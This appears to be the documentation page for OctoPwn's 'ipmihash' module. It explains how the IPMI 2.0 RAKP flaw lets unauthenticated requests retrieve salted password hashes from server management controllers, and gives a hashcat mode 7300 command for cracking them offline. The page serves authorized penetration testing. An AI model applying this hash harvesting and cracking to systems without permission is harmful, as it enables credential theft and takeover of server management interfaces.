Skip to content

IPMI Hash Attack (ipmihash)

A significant flaw in the IPMI 2.0 specification allows the server (Baseboard Management Controller or BMC) to send a salted SHA1 or MD5 hash of a user's password during the authentication process. This means that for any valid user account, the attacker can request and retrieve the password hash without completing authentication. The extracted hashes can then be subjected to offline brute force or dictionary attacks to recover the plaintext password.

The ipmihash attack automates this process: it tries the standard set of common BMC usernames (admin, administrator, root, user, guest, …) against every target on 623/UDP and, for any user the BMC acknowledges, captures the RAKP salted hash. Recovered hashes are stored in the Credentials Hub with stype = ipmi, source = IPMI — the secret value is the Hashcat-7300 format string, ready for offline cracking.

Hash Extraction Process

  1. Retrieve Hashes:
  2. The BMC responds to a client's request by sending a salted SHA1 or MD5 hash of the requested user's password.

  3. This hash is extracted without the need for successful authentication.

  4. Crack Passwords:

  5. Hashcat mode 7300 (IPMI2 RAKP HMAC-SHA1).

    hashcat --username -m 7300 ipmi.hashes wordlist.txt

See also

  • ipmicaps scanner — pre-flight check that enumerates which IPMI ciphersuites the target advertises (and whether it accepts the unauthenticated cipher 0).
  • ipmicipherzero scanner — checks for the cipher 0 authentication-bypass condition; if positive, you don't even need this attack.

Parameters

Normal Parameters

targets

Specifies the targets for the attack.

A list of targets can be specified in the following formats:

  • ID: ID of the target server from the Targets Window.
  • IP: Single IP address (e.g., 192.168.1.1).
  • CIDR: IP range in CIDR notation (e.g., 192.168.1.0/24).
  • Hostname: Resolvable hostname.
  • File: Path to a file containing targets (must be in OctoPwn’s /browserefs/volatile directory). File lists need to be uploaded into OctoPwn and separated by newlines.
  • Control word: Use all to attack all stored targets.

Advanced Parameters

maxruntime

Specifies the maximum runtime for the attack.

proxy

Specifies the proxy ID to use for the attack.

Enter the ID of the proxy to route the attack through. Proxies must be configured in the Proxy Window.

resultsfile

Specifies a file for saving the attack results.

The file will be saved in OctoPwn’s /browserefs/volatile directory.

showerrors

Determines whether errors encountered during the attack should be displayed.

timeout

Sets the timeout (in seconds) for each target.

workercount

Specifies the number of parallel workers for the attack.

wsnetreuse

Internal parameter. Do not modify.